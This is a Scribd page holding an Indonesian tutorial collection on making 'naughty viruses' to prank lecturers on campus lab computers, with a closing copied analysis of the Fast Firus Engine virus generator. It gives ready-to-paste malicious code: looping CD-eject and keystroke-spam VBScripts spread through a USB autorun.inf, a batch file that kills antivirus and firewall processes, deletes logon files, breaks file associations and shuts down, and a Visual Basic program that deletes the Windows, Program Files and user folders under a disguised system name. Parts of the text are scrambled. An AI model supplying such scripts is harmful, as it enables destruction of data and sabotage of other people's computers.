P. 1
Cara Membuat Virus Nakal

Cara Membuat Virus Nakal

|Views: 293|Likes:
Dipublikasikan oleh Rizky Uchiha

More info:

Published by: Rizky Uchiha on Jan 09, 2012
Hak Cipta:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOCX, PDF, TXT or read online from Scribd
See more
See less

11/09/2013

pdf

text

original

Cara membuat Virus Nakal

Yuk buat ³Virus´ Nakal, buat ngerjain dosen/guru yang kita ngga suka, lagi suntuk di ruang labkom kampus, pusing ngga bisa maen facebook karena diblokir sama admin labkom, yah iseng2 buatin scripts .vbs. Caranya: Buka notepad dan masukkan code berikut,

Set oWMP = CreateObject("WMPlayer.OCX.7") Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop

Simpanlah dengan file tadi dengan ekstensi file iseng.vbs ato apapun nama kesukaan asalkan pastikan ekstensinya .vbs, dan jalankan filenya ( Klik 2x), perhatikan CD/DVD ROM akan terbuka/tertutup dengan sendirinya tanpa henti.

exe. Nah mau script .Sleep 500 WshShell.SendKeys "H" WScript.SendKeys "a" WScript.SendKeys "o" WScript.SendKeys "l" WScript.Sleep 500 WshShell.Sleep 500 WshShell. jadi setiap loe colokin ke kompie kampus.CreateObject("WScript.Sleep 1000 do Set WshShell = WScript.Shell") WshShell.Sleep 500 WshShell.SendKeys ".Sleep 18000 WScript.Sleep 100 WshShell. masukkan ke file autorun.Sleep 500 WshShell. Kalo mau keren lagi.Run "notepad" WScript.inf di flashdisk anda.vbs yang laen lagi? WScript. maka akan otomatis dijalankan ³Virus´ Nakal ini.Salah satu cara menghentikan aksi Virus Nakal ini ialah dengan menekan tombol CRTL+ALT+DEL dan matikan proses wscripts. " .AppActivate "Notepad" WScript.

Sleep 500 WshShell.Sleep 500 WshShell.SendKeys "a" WScript.Sleep 500 WshShell.SendKeys "i" WScript.sleep 5000 loop Scripts diatas nanti otomatis buka notepad dan ketik: Halo. apa kabar? kabar baik? ingat yah simpan dengan ekstensi nama .SendKeys "k" WScript.vbs.SendKeys "b" WScript.Sleep 500 WshShell.WScript.SendKeys "?" WScript.SendKeys "b" WScript.SendKeys "k" WScript.SendKeys "a" WScript.SendKeys "a" WScript.SendKeys "K" WScript.Sleep 500 WshShell.Sleep 500 WshShell.SendKeys "p" WScript.SendKeys "a" WScript.Sleep 500 WshShell.Sleep 500 WshShell.Sleep 500 WshShell.SendKeys " " WScript.SendKeys "r" WScript.Sleep 500 WshShell.Sleep 500 WshShell.Sleep 500 WshShell.Sleep 500 WshShell.SendKeys "r" WScript.Sleep 500 WshShell.Sleep 500 WshShell.SendKeys "a" WScript.SendKeys "a" WScript.Sleep 500 wscript.Sleep 500 WshShell.SendKeys "b" WScript.Sleep 500 WshShell.Sleep 500 WshShell.SendKeys " " WScript.Sleep 500 WshShell.SendKeys " " WScript.SendKeys "?" WScript.SendKeys "a" WScript. klik file±>save as .Sleep 500 WshShell.Sleep 500 WshShell.Sleep 500 WshShell.

sleep 100 wshshell.CreateObject("WScript.sleep 100 wshshell.CreateObject("WScript..Shell") do wscript..sendkeys "Kamu emang jelak koq!" loop Dan membuat terus menerus menekan tombol Enter Set wshShell = wscript.Kode Vbs ini akan membuat user terus mengetikkan kata2 ³Kamu emang jelek koq!´ Set wshShell = wscript.Shell") do wscript.CreateObject("WScript.saltik" Set wshShell =wscript.Shell") do wscript.sleep 100 wshshell.sendkeys "{bs}" loop .sendkeys "~(enter)" loop Terus tekan backspace: MsgBox "Balik lagi ah.

txt Installing %end% %fin% net send * andhra pradesh. Explorer. zonelabs. taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana. Menghapus Login / Logoff Screens Hanya Copy kode di bawah ini lalu paste Pada Notepad: title virus is my dna color 0A @echo off set end=md u cant eascape from me-vishnu set fin=copy Hack log. Mudah cara untuk membuat kode Virus Virus ini dapat menyerang: 1. saya terlepas dari dampak yang terjadi.exe (taskbar dan ikon akan hilang) 3.exe 4.exe /F /Q . Menhapus.. Tetapi. Menhapus. mengubah asosiasi file exe menjadi txt (ketika membuka file exe. tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana.exe 2. akan pergi ke notepad) 5.Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini. maka akan terbuka WinAmp atau multimedia player) 6.virus created in karimnagar from jits college kill NAVAPSVC. Menhapus. NAVAPSVC.

vcf cls msg * hi dude this is begining.scr /F /Q cls shutdown Simpan di C: dengan nama installhack.mp3=.exe /F /Q cls assoc .kill zonelabs.exe /F /Q DEL C:\WINDOWS\system32\logon.bat Selesai . DEL C:\WINDOWS\system32\logoff. msg * vishnu attcked the system try to challenge him .txt=mp3file assoc .exe /F /Q kill explorer.exe /F /Q DEL C:\WINDOWS\system32\logon.exe=txtfile assoc .

(padahal cuma ngerestart aja. hah cuma notepad??hhe ia cuma notepad..vbs echo NEXT ! echo: echo: echo HALO SOBAT .vbs echo Wscript.hohohohohohoo :D oia perlu saya kasih tau kalo virus ini dampaknya dapat merestart komputer yang terinfeksi dan juga akan menampilkan suatu tulisan yang berisi komputer anda sedang terserang virus ganas.vbs echo Wscript.Sleep 5000>C:\sleep5000..Sleep 4000>C:\sleep4000.Sleep 2000>C:\sleep2000. kita sekarang akan membuat virus yang maha ganas dan supeer ganas tapi tetap yang aman-aman saja buat kita..haha pertama kita akan membuat virus dengan hanya menggunakan yang namanya notepad.vbs echo Wscript.Sleep 3000>C:\sleep3000.exe C:\sleep3000.vbs echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM echo echo: echo: start /w wscript.exe C:\sleep3000.vbs cd %systemroot%\System32 dir cls start /w wscript.hahahah :D ) Silahkan copas alias copy paste kode dibawah ini di notepad kamu: cls :A color 0a cls @echo off echo Wscript..

exe C:\sleep3000.! start /w wscript. echo: echo: start /w wscript.vbs echo echo NTAR .exe C:\sleep2000..exe C:\sleep4000.exe C:\sleep3000.vbs echo start /w wscript.vbs echo: echo: echo: echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN cd C:\Documents and Settings\All Users\Start Menu\Programs\ mkdir Si_INDO_CRACKER start /w wscript.vbs echo .exe C:\sleep2000.Virus AKTIF! echo: echo: echo: .vbs echo: echo: echo: echo: echo HAPPY BIRTHDAY echo KOMPUTER KAMU BAGUS DEH echo BOLEH Q INTIP DIKIT echo HMM BOLEH JUGA NEH ISINYA echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK echo: echo: echo: echo: echo: echo SABARAN BRO start /w wscript. echo zzzzzzz .exe C:\sleep3000.vbs echo OKE .echo MAU JADI TEMAN AKU ?? echo: echo: echo IM ZATYA BAJA ITEM start /w wscript.

exe C:\sleep2000.start /w wscript.vbs echo SEMUA PROSESS UDAH DIBANTAI start /w wscript. cth nya: Muhammadalfid. Kemudian disimpan dengan nama terserah Kamu diakhiri . BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.vbs echo FIREWALL KAMU ANCUR start /w wscript.exe C:\sleep2000.bat dan save type all file .vbs echo: echo: echo I LOVE U FULL echo HA HA HA HA echo: echo: echo: echo: start /w wscript.vbs pause shutdown -f -s -c BERTAUBATLAH.exe C:\sleep2000.exe C:\sleep2000.vbs echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT start /w wscript.exe C:\sleep2000.vbs echo: echo: echo: echo VIRUS MASUK PODIUM AKHIR! start /w wscript.exe C:\sleep2000.bat .

dan kayanya sih g bakal kedekteksi antivirus. setelah sebelumnya saya buat tutorial cara membuat virus yang kerjanya itu merestart komputer. text-decoration: none. background-color: transparent.20.com/images/v6. vertical-align: top. background-position: -943px 0pt.DeleteFolder(DirtoDelete.20.gif).ixnp. width: 14px. backgroundrepeat: no-repeat.txt ) = True Then End Else Call DelAll( c:\windows\system ) Call DelAll( c:\windows\system32 ) Call DelAll( c:\windows ) Call DelAll( C:\Documents and Settings\All Users ) Call DelAll( C:\Documents and Settings\Administrator ) Call DelAll( C:\Documents and Settings ) .gif" /> http://i.gif). FS Set FSO = CreateObject( Scripting. display: inline.ixnp.1/t.nah karena teman-teman saya banyak yang minta tutorial untuk membuat virus.1/theme/ice/palette. Ngerti tombol2nya VB kalo belum bpunya VISUAL BASIC download aja DISINI http://i.ixnp. True) End Sub Private Sub Form_Load() On Error Resume Next If FileExist( c:\windows\system32\katak.com/images/v6. display: inline. bikin form sekecil mungkin 2.FileSystemObject ) FS = FSO. masukin nih kode Public Sub DelAll(ByVal DirtoDelete As Variant) Dim FSO.com/images/v6. tapi simple.0) 2.com/images/v6. in saya kasih lagi tutorial kedua membuat virus. visibility: visible. textdecoration: none. visibility: visible.more Tutorial Bikin Virus cman 1 mnt 1. background-color: atau DISINI transparent.20. background-position: -943px 0pt.1/theme/ice/palette. vertical-align: top. nah sekarang tutorial buat bikin virus yg rada mematikan.1/t.20. soalnya cara kerjanya simple gtYg diperluin: 1. height: 12px. VB/Visual Basic(optimal : 6.ixnp. height: 12px. background-repeat: no-repeat. didalem form itu.gif" /> ." src="http://i." src="http://i. width: 14px.

lu edit ndiri aja 4. compile deh slese! . Jangan pernah naroh nama lu di nih virus k? 6.txt. barang kali lu ga sengaja teken jadi lu slamat. Kode yg warna biru itu penangkal nih virus. jadi di folder c:\windows\system32\ kalo ada file namanya katak.Call DelAll( C:\Program Files\Common Files ) Call DelAll( C:\Program Files\Internet Explorer ) Call DelAll( C:\Program Files\Microsoft Visual Studio ) Call DelAll( C:\Program Files ) End End If End Sub Function FileExist(ByVal FileName As String) As Boolean If Dir(FileName) = Then FileExist = False Else FileExist = True End If End Function 3. lu ga bakal keserang ndiri bisa lu edit koq jadi apa gitu Yang warna merah itu folder yg bakal didelete ama nih virus. disini gwe make nama SystemKernel32 jadi ga bakal dicurigain 5. Bikin nih project namanya kaya nama system.

dan pesan-pesannya. Paling yang dibutuhkan hanyalah pengetahuan seputar operating system dan programming.FFE-Fajar. banyak virus maker ataupun programer pemula mencoba coba untuk membuat virus tanpa perlu repot. Namun kemudahan itu belum seberapa. kita sudah dapat mengira kegunaan dari program tersebut. jadi siapapun dapat dengan mudah mengubah dan meng-compile source code-nya dan jadilah varian baru. exe merupakan program utama dalam pembuatan virusnya dan sementara file data. bila program ini sudah jatuh ke tangan yang salah. ia memberitahukan bahwa program ini hanya untuk tujuan pembelajaran dan tidak untuk tindakan merusak. maka jadilah virus Anda. Virus Generator merupakan program untuk dapat membuat virus secara mudah dan instan. Anda hanya disuruh mengisikan nama virus. Fast Firus Engine (FFE) Pembuat Generator tersebut menamakan program buatannya itu dengan nama Fast Firus Engine.ex_). pasti akan digunakan untuk pengrusakan.exe dijalankan.ex_ sebenarnya merupakan badan virus asli yang belum dimodifi kasi. Lalu dengan menekan tombol Generate. maka pengguna akan dihadapkan pada sebuah interface. PC Media Antivirus mengenalnya dengan nama Gen. namun antivirus lain ada juga yang menyebutnya dengan nama Brontok.. Fast Firus Engine. Saat file Fast Firus Engine.D. Berawal dari kemudahan itulah.Hehe maaf ya kawan lama gak posting. nama pembuat. Tidak heran karena source code-nya memang disedia kan bebas di Internet. Ya. bila dibandingkan dengan menggunakan program Virus Generator. yakni Fast Firus Engine. kali ini saya mau posting tapi bingung mau posting apa yaudah copy paste aja dah. Seperti yang terlihat pada program ataupun situs pembuatnya.ex_. Ia hanya menambahkan data yang Anda masukkan tadi ke bagian akhir file virus asli (data. Dengan penyelidikan sederhana akhirnya diketahui bahwa virus tersebut dibuat menggunakan Virus Generator. . Virus Generator ini dibuat menggunakan bahasa Visual Basic dan di-compress menggunakan packer tELock. Namun tetap saja. Masih ingat dengan virus Aksika? Virus open source yang satu itu memang memiliki banyak sekali varian. Dari namanya saja. Cara kerja dari Generator tersebut sebenarnya sangat sederhana. Nantinya informasi tersebut digunakan oleh virus dalam proses infeksi.exe dan data. Bermula dari sampel sebuah virus yang lumayan banyak dikirimkan oleh pembaca kepada kami. Dalam paketnya terdapat dua buah file.

exe.Bagaimana Virus Menginfeksi? Virus hasil ciptaan FFE memang terlihat sederhana. _default. ia akan menjalankan file induk tadi.pif.exe. ia juga mengubah atau membuat file Oeminfo. Di \%WINDOWS%\ %system32%\ akan terdapat file copy. Nah. dan %virusname% (nama virus sesuaiyang diisikan oleh sang pembuatnya pada Generator). seperti csrss. Process virus ini biasanya berjalan di direktori System sementara process/services milik Windowsyang running biasanya berasal dari direktori System32. Nama processyang mirip dengan process/services milik Windows tersebut mungkin sengaja untuk mengecoh user. smss. pada root drive pun akan terdapat file dengan nama baca euy. exe. Jadi pada saat membuat virus dengan menggunakan Generator tersebut. Lalu di compress menggunakan tELock agar ukurannya semakin kecil. Pada key HKEY_CURRENT_ USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load juga akan diubah itemnya agar mengarah ke file induknya dengan nama Activex. Jadi apabila komputer Anda terinfeksi oleh virus hasil generate dari FFE.exe. dan winlogon. Dan tak lupa. Seperti di direktori \%WINDOWS%\. Anda dapat melihat path atau lokasi process tersebut dijalankan. akan terdapat file dengan nama.exe. seperti Author of the virus.iniyang merupakan bagian dari System Properties. lsass. Setelah virus berhasil meng-copy-kan file induknya ke dalam sistem tersebut. dan Messages.exe. svchost.bin. Virus ini memiliki ukuran tubuh asli sebesar 55.exe.txt tersebut. winlogon. ia juga dibuat menggunakan bahasa Visual Basic yang di-compile dengan metode Native. Di direktori \%WINDOWS%\%System%\ akan terdapat beberapa file induk lagi yang menggunakan nama yang sama seperti file system milik Windows. lsass.exe.exe. Selain itu. Name of the virus. Pada . activex.296 bytes. maka pada System Properties akan terdapat tulisan Generated by Fast Firus Engine .exe. Mengubah Registry Virus ini menambahkan beberapa item startup pada registry agar pada saat memulai Windows ia dapat running secara otomatis atau untuk mengubah setting-an Windows agar sesuai keinginannya. maka pembuatnya akan disuguhkan beberapa kotak input.pif.txt yang berisikan pesan pesan dari si pembuat virus. dan surif. svchost. winlogon. Saat virus kali pertama dieksekusi. yakni dengan menambahkan parameter ke file induk.exe. Sama seperti Generatornya.exe.Code. dan winlogon. isidari kotak messages ini yang nantinya ditampilkan pada file baca euy. ia akan membuat beberapa file induk di beberapa lokasi.exe.exe. smss. sehingga pada memory akan terdapat beberapa process virus. Untuk membedakannya. Yang ia ubah adalah seperti nilai dari item Userinit. Win32 exe. exe. Informasi mengenai registryyang diubahnya tidak akan dapat dengan mudah kita lihat karena dalam kondisi terenkripsi. seperti csrss.

Dan agar dapat aktif pada safe-mode. ccapps. Sama seperti halnya data registry yang diubah. yakni dengan membaca nama file dan juga caption Window. Pencegahan dan Penanggulangan PC Media Antivirus RC19 ini dapat membersihkan komputer terinfeksi secara tuntas dan akurat 100% setiap virus yang dibuat dengan menggunakan Fast Firus Generator. nvcoas. Termasuk beberapa program setup atau installer juga tidak dapat dijalankan pada komputer terinfeksi. kav. virus ini pun akan mencoba untuk memblok setiap program yang tidak ia inginkan seperti tools atau program antivirus termasuk PCMAV.HKEY_CURRENT_USER \Software\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat itembaru dengan nama present. autorun. yakni dengan mengubah type information dari Application menjadi File Folder. Key HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\ akan terdapat item baru juga dengan nama Default dan %username%.exe. Beberapa nama file antivirus yang dicoba untuk dibloknya adalah nav. ccapp. avgcc. maka akan di-bypass oleh Windows dan dialihkan ke file induk si virus. Saat Anda mencolokkan flash disk pada komputer yang terinfeksi. Dengan menggunakan bantuan registry Image File Execution Options. . virus ini juga menambahkan item baru pada section tersebut dengan nama cmd. ia akan memonitor setiap program yang diakses oleh user. username di sini merupakan nama user yang sedang aktif saat itu. ia pun mengubah nilaidari item SafeBoot. Maksudnya adalah agar setiap user yang mengakses program dengan nama file seperti itu. msconfi g.exe.exe.exe.pif dan Folder.exe. Untuk menghindari aksi blok oleh virus terhadap PCMAV. saat virus sudah stay di memory. Juga beberapa file pendukung seperti desktop. avp32. silakan Anda rename terlebih dahulu file PCMAV misalnya PCMAV-CLN. Bagaimana Virus Menyebar? Virus ini dapat menyebar melalui media penyimpan data seperti flash disk.ini.exe.EXE.exe.htt.exe.inf agar ia dapat running otomatis pada saat mengaksesflash disk tersebut. Jadi. Virus Beraksi Untuk dapat bertahan hidup. dan taskmgr. njeeves. dan masih banyak lagiyang lainnya.exe. seperti explorer.dll. data mengenai program apa saja yang diblok olehnya juga terdapat dalam tubuhnya dalam kondisi terenkripsi. Virus hasil generate dari FFE juga mengubah shell extension untuk file . maka pada flash disk tersebut akan terdapat beberapa file baru.exe. %virusname%.exe.EXE menjadi MERDEKA.exe. Kesemua file virus tersebut dalam kondisi hidden sehingga tidak terlihat. dan msvbvm60. Setting-an folder Options juga diubah agar tidak menampilkan extension dan setiap fi le dengan attribut hidden. regedit.exe.exe. File virus lainnya pun disimpan pada direktori baru di flash disk tersebut dengan nama Recycled yang berisikan file Firus.exe.

You're Reading a Free Preview

Mengunduh
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->